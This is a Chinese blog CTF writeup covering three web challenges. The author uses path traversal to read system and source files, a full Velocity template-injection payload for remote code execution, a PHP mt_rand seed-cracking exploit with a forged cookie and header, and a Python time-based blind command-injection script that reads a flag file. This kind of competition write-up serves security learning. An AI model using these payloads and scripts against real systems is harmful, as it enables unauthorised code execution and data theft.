“钓鱼城杯”国际网络安全技能大赛Writeup

颖奇L'Amore发布

Author:颖奇L’Amore

Blog:www.gem-love.com

zblog

在title找到了任意文件读取

view-source:http://122.112.253.135/?title=../../../../../../../etc/passwd

view-source:http://122.112.253.135/?title=../../../../../../../home/ctf/web/.idea/workspace.xml
  <component name="IdeDocumentHistory">
    <option name="CHANGED_PATHS">
      <list>
        <option value="$PROJECT_DIR$/src/main/resources/hello.vm" />
        <option value="$PROJECT_DIR$/src/main/resources/aaa" />
        <option value="$PROJECT_DIR$/pom.xml" />
        <option value="$PROJECT_DIR$/src/main/resources/index" />
        <option value="$PROJECT_DIR$/src/main/resources/templates/My First Blog" />
        <option value="$PROJECT_DIR$/src/main/resources/templates/hello" />
        <option value="$PROJECT_DIR$/src/main/resources/templates/index" />
        <option value="$PROJECT_DIR$/src/main/java/Blog.java" />
      </list>
    </option>
  </component>

得到源码:

view-source:http://122.112.253.135/?title=../../../../../../../home/ctf/web/src/main/java/Blog.java

import static spark.Spark.*;
import java.io.*;
import org.apache.velocity.Template;
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;
import spark.template.velocity.VelocityTemplateEngine;


import java.io.StringWriter;

public class Blog {

    private static void log(String fname, String content) {
        try {
            FileWriter writer = new FileWriter(fname, true);
            writer.write(content);
            writer.close();
        } catch (IOException e) {

        }
    }

    public static void main(String[] arg) {
        staticFiles.location("/public");

        VelocityEngine velocityEngine = new VelocityEngine();
        velocityEngine.setProperty(VelocityEngine.RESOURCE_LOADER, "file");
        velocityEngine.setProperty(VelocityEngine.FILE_RESOURCE_LOADER_PATH, "/");
        velocityEngine.init();
        VelocityContext context = new VelocityContext();

        get("/", (request, response) -> {
            request.session(true);
            String title = request.queryParams("title");
            if (title != null) {
                log("/tmp/" + request.session().id(), "Client IP: " + request.ip() + " -> File: " + title + "\n");
                Template template = velocityEngine.getTemplate("/home/ctf/web/src/main/resources/templates/" + title);
                StringWriter sw = new StringWriter();
                template.merge(context, sw);
                return sw;
            }
            Template template = velocityEngine.getTemplate("/home/ctf/web/src/main/resources/templates/index");
            StringWriter sw = new StringWriter();
            template.merge(context, sw);
            return sw;
        });
    }
}

velocity模板注入RCE,payload(别忘了url编码):

#set($s="")#set($stringClass=$s.getClass())#set($stringBuilderClass=$stringClass.forName("java.lang.StringBuilder"))#set($inputStreamClass=$stringClass.forName("java.io.InputStream"))#set($readerClass=$stringClass.forName("java.io.Reader"))#set($inputStreamReaderClass=$stringClass.forName("java.io.InputStreamReader"))#set($bufferedReaderClass=$stringClass.forName("java.io.BufferedReader"))#set($collectorsClass=$stringClass.forName("java.util.stream.Collectors"))#set($systemClass=$stringClass.forName("java.lang.System"))#set($stringBuilderConstructor=$stringBuilderClass.getConstructor())#set($inputStreamReaderConstructor=$inputStreamReaderClass.getConstructor($inputStreamClass))#set($bufferedReaderConstructor=$bufferedReaderClass.getConstructor($readerClass))#set($runtime=$stringClass.forName("java.lang.Runtime").getRuntime())#set($process=$runtime.exec("whoami"))#set($null=$process.waitFor() )#set($inputStream=$process.getInputStream())#set($inputStreamReader=$inputStreamReaderConstructor.newInstance($inputStream))#set($bufferedReader=$bufferedReaderConstructor.newInstance($inputStreamReader))#set($stringBuilder=$stringBuilderConstructor.newInstance())#set($output=$bufferedReader.lines().collect($collectorsClass.joining($systemClass.lineSeparator())))$output

然后再去读一下log文件看命令执行结果

easyseed

index.bak:

$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');

function random($length, $chars = '0123456789ABC') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}

cookie处得到lockEUHaY,由header可知PHP的版本X-Powered-By: PHP/5.6.28

PHP伪随机数问题,和GWCTF枯燥的抽奖差不多,老考点了,exp:

<?php
//Y1ng
function getSeed()
{
    $chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ';
    $max = strlen($chars) - 1;

    $hash_result = 'vEUHaY';
    $arr = [];
    $index = 0;
    for ($i=0; $i< strlen($hash_result); $i++)
    {
        for ($j=0; $j< strlen($chars); $j++)
        {
            if ( $hash_result[$i] === $chars[$j] )
            {
                $arr[$index] = $j;
                $index++;
                break;
            }
        }
    }
    echo "./php_mt_seed ";
    for ($i = 0; $i<count($arr); $i++)
    {
        echo "${arr[$i]} ${arr[$i]} 0 ${max} ";
    }
    echo "\n";
}

function getKey()
{
    function random($length, $chars = '0123456789ABC') {
        $hash = '';
        $max = strlen($chars) - 1;
        for($i = 0; $i < $length; $i++) {
            $hash .= $chars[mt_rand(0, $max)];
        }
        return $hash;
    }
    mt_srand(718225);
    $lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
    $key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
    echo $lock . ' ' . $key;
}
getSeed(); //./php_mt_seed 21 21 0 51 30 30 0 51 46 46 0 51 33 33 0 51 0 0 0 51 50 50 0 51
getKey(); //  vEUHaY nRtqGR8mtd9ZOPyI

爆破出种子718225,之后计算$keynRtqGR8mtd9ZOPyI,放到cookie里,还需要XFF头伪造个127.0.0.1,即可得到flag。

easyweb

在header处写到post cmd,于是POST提交一个cmd可以执行命令,但是不出网,于是bash时间盲注。

可以直接利用第三届BJDCTF帮帮小红花一题的exp,除了把GET提交改成POST提交,其他一点没变,exp:

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com

import requests
import time as t
from urllib.parse import quote as urlen
url  = 'http://119.3.37.185/'
alphabet = ['{','}', '.', '@', '_','=','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']

result = ''
for i in range(1,50):
	for char in alphabet:
		payload = "if [ `ls / | grep 'flag' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char) #/flag.txt
		payload = "if [ `cat /flag.txt |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char)
		data = {'cmd':payload}
		try:
			start = int(t.time())
			r = requests.post(url, data=data)
			end = int(t.time()) - start
			if end >= 3:		
			    result += char
			    print("Flag: "+result)
			    break
		except Exception as e:
			print(e)

颖奇L'Amore原创文章,转载请注明作者和文章链接

本文链接地址:https://www.gem-love.com/ctf/2612.html

注:本站定期更新图片链接,转载后务必将图片本地化,否则图片会无法显示

打赏分享
分类: CTF

颖奇L'Amore

Most of the time is also called Y1ng. Cisco Certified Internetwork Expert - Routing and Switching. CTF player for team r3kapig. Forcus on Web Security. Islamic Scholar. Be good at sleeping and fishing in troubled waters.

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注

在此处输入验证码 : *

Reload Image

相关文章

2020祥云杯Writeup

目录 Commandflask boteasygogogdoyoukn 阅读更多…

N1CTF 2020 Writeup

目录 web-signinMisc-filterweb-zabbix_ 阅读更多…

🇯🇵SECCON 2020 OnlineCTF Writeup

目录 Beginner’s CapsuleCapsule非 阅读更多…